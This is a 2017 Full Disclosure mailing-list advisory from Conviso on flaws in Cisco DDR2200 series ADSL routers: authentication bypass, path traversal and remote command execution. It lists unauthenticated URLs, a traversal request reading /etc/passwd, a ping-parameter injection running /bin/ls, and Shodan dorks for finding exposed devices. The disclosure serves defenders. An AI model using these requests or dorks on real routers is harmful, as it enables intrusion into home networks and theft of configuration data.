[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] CVE request: Multiple vulnerabilities in Cisco DDR2200 Series



*Copyright and Disclaimer*

The information in this advisory is Copyright 2017 Conviso and provided so that 
the society can understand the risk they may be facing by running affected 
software, hardware or other components used on their systems. In case you wish 
to copy information from this advisory, you must either copy all of it or refer 
to this document (including our URL). No guarantee is provided for the accuracy 
of this information, or damage you may cause your systems in testing.

*About Conviso*

Conviso is a consulting company specialized on application security. Our values 
are based on the allocation of the adequate competencies on the field, a clear 
and direct speech with the market, collaboration and partnership with our 
customers and business partners and constant investments on methodology and 
research improvement.

This advisory has been discovered as part of a general investigation into the 
security of software used in the IT environments of our customers. For more 
information about our company and services provided, please check our website 
at www.conviso.com.br.

*The Security Research*

Conviso maintains a virtual team dedicated to explore our customer’s 
environments in order to identify technical vulnerabilities in software and 
hardware, developing real-world mitigation solutions and processes to maintain 
more secure environments. This team is named Conviso Labs and also contribute 
to important world-class projects and organizations.
The vulnerability described in this security advisory was discovered by Matheus 
Bernardes on July 15th 2017 during an internal security research.

*Security Advisory*
The page used to download the configuration file is vulnerable to path 
traversal, that allows an attacker to download any system file.

*Issue Description*
Some of Cisco DDR2200 router series, show some vulnerabilities as, 
authentication bypass, Remote code execution and path traversal

As a result, an attacker can gain access to the router configuration, access to 
internal files and a limited command execution.

*Shodan Dork*
http.title:"Cisco DDR2201v1 ADSL2+ Residential Gateway"
http.title:"Cisco DDR2200 ADSL2+ Residential Gateway"

*Affected Components*
*Device*: Cisco DDR2201v1 ADSL2+ Residential Gateway 
*Software Version*: DDR2201v1-NA-AnnexA-FCC-V00.00.03.28.3 
Path Traversal    
Bypass Authentication
Remote code execution (RCE)

*Device*: Cisco DDR2200 ADSL2+ Residential Gateway
*Software Version*: DDR2200B-NA-AnnexA-FCC-V00.00.03.45.4E 
Remote code execution (RCE)
Path Traversal    

*Vulnerabilities details*
Bypass Authentication
Some pages don’t need the user to be authenticated to gain access
http://192.168.0.1:8080/info.html
http://192.168.0.1:8080/wancfg.cmd?action=view
http://192.168.0.1:8080/rtroutecfg.cmd?action=view
http://192.168.0.1:8080/arpview.cmd
http://192.168.0.1:8080/cpuview.cmd
http://192.168.0.1:8080/memoryview.cmd
http://192.168.0.1:8080/statswan.cmd
http://192.168.0.1:8080/statsatm.cmd
http://192.168.0.1:8080/scsrvcntr.cmd?action=view
http://192.168.0.1:8080/scacccntr.cmd?action=view
http://192.168.0.1:8080/logview.cmd
http://192.168.0.1:8080/voicesipview.cmd
http://192.168.0.1:8080/voicesipview.cmd?view=advanced
http://192.168.0.1:8080/usbview.cmd
http://192.168.0.1:8080/wlmacflt.cmd?action=view
http://192.168.0.1:8080/wlwds.cmd
http://192.168.0.1:8080/wlstationlist.cmd
http://192.168.0.1:8080/HPNAShow.cmd
http://192.168.0.1:8080/HPNAView.cmd
http://192.168.0.1:8080/qoscls.cmd?action=view
http://192.168.0.1:8080/qosqueue.cmd?action=view
http://192.168.0.1:8080/portmap.cmd
http://192.168.0.1:8080/scmacflt.cmd?action=view
http://192.168.0.1:8080/scinflt.cmd?action=view
http://192.168.0.1:8080/scoutflt.cmd?action=view
http://192.168.0.1:8080/certlocal.cmd?action=view
http://192.168.0.1:8080/certca.cmd?action=view
http://192.168.0.1:8080/waitPingqry.cgi
http://192.168.0.1:8080/PingMsg.cmd

*Path Traversal*
The page used to download the configuration file, is vulnerable to path 
traversal, that allow an attacker to download any system file.
http://192.168.0.1:8080/download.conf?filename=/etc/passwd 

*Remote code execution (RCE)*
*Description*
The ping function allows arbitrary code execution. Just add a ; and then the 
full path of a binary:
http://192.168.0.1:8080/waitPingqry.cgi?showPingResult=1&pingAddr=;/bin/ls
After the previous request finish, just access the follow page to see the output
http://192.168.0.1:8080/PingMsg.cmd

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/